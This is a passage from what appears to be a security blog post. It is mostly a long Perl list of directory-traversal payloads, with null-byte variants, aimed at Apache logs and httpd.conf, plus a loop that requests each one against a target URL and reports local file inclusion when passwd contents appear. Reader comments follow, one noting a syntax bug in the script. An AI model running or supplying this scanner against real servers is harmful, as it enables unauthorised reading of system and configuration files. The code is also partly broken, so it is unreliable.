'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
'/var/log/httpd/error_log',
'../var/log/httpd/error_log',
'../../var/log/httpd/error_log',
'../../../var/log/httpd/error_log',
'../../../../var/log/httpd/error_log',
'../../../../../var/log/httpd/error_log',
'../../../../../../var/log/httpd/error_log',
'../../../../../../../var/log/httpd/error_log',
'../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../var/log/httpd/error_log',
'/var/log/httpd/error_log%00',
'../var/log/httpd/error_log%00',
'../../var/log/httpd/error_log%00',
'../../../var/log/httpd/error_log%00',
'../../../../var/log/httpd/error_log%00',
'../../../../../var/log/httpd/error_log%00',
'../../../../../../var/log/httpd/error_log%00',
'../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../var/log/httpd/error_log%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'/etc/httpd/conf/httpd.conf',
'../etc/httpd/conf/httpd.conf',
'../../etc/httpd/conf/httpd.conf',
'../../../etc/httpd/conf/httpd.conf',
'../../../../etc/httpd/conf/httpd.conf',
'../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf%00',
'../etc/httpd/conf/httpd.conf%00',
'../../etc/httpd/conf/httpd.conf%00',
'../../../etc/httpd/conf/httpd.conf%00',
'../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'/etc/apache/conf/httpd.conf',
'../etc/apache/conf/httpd.conf',
'../../etc/apache/conf/httpd.conf',
'../../../etc/apache/conf/httpd.conf',
'../../../../etc/apache/conf/httpd.conf',
'../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../../etc/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf%00',
'../etc/apache/conf/httpd.conf%00',
'../../etc/apache/conf/httpd.conf%00',
'../../../etc/apache/conf/httpd.conf%00',
'../../../../etc/apache/conf/httpd.conf%00',
'../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'/usr/local/etc/apache/conf/httpd.conf',
'../usr/local/etc/apache/conf/httpd.conf',
'../../usr/local/etc/apache/conf/httpd.conf',
'../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf%00',
'../usr/local/etc/apache/conf/httpd.conf%00',
'../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'/etc/apache2/httpd.conf',
'../etc/apache2/httpd.conf',
'../../etc/apache2/httpd.conf',
'../../../etc/apache2/httpd.conf',
'../../../../etc/apache2/httpd.conf',
'../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../../etc/apache2/httpd.conf',
'/etc/apache2/httpd.conf%00',
'../etc/apache2/httpd.conf%00',
'../../etc/apache2/httpd.conf%00',
'../../../etc/apache2/httpd.conf%00',
'../../../../etc/apache2/httpd.conf%00',
'../../../../../etc/apache2/httpd.conf%00',
'../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../../etc/apache2/httpd.conf%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');
print ">start scaning[...]\n";

foreach $scan(@vuls){
$url = $link.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = LFI PRESENT!;}
else { $msg = "Not Found";}
print "$scaning..........[$msg]\n";
#EOF
}

6 comments:

  1. Hey HR,

    Really good tutorial about fimap.
    I have put a link on the fimap homepage to this post.
    Thank you for taking your time and making this tutorial :)
    I was always to lazy to make something like that :O

    -imax.

    ReplyDelete
  2. Thanks for the great feedback Iman, you just made my day! I appreciate your hard work on this great tool and look forward to future updates to come. If you ever need a hand with anything just shoot me a note.

    ReplyDelete
  3. I have found here much useful information for myself. Many thanks to the editors for the info.

    Deck Helmet

    ReplyDelete
  4. hey missed "LFI Present!" on >>> if ($response->is_success && $response->content =~ /root:x:/) { $msg = LFI PRESENT!;}

    and

    ReplyDelete
  5. Hey,

    I am trying to use the tool which needs username and password to enter the site. I have access to do so and know the credentials. How to do so?

    ReplyDelete
  6. Hey HR how can i get the HR's fun house vuln webapplication. Thanks in advance

    ReplyDelete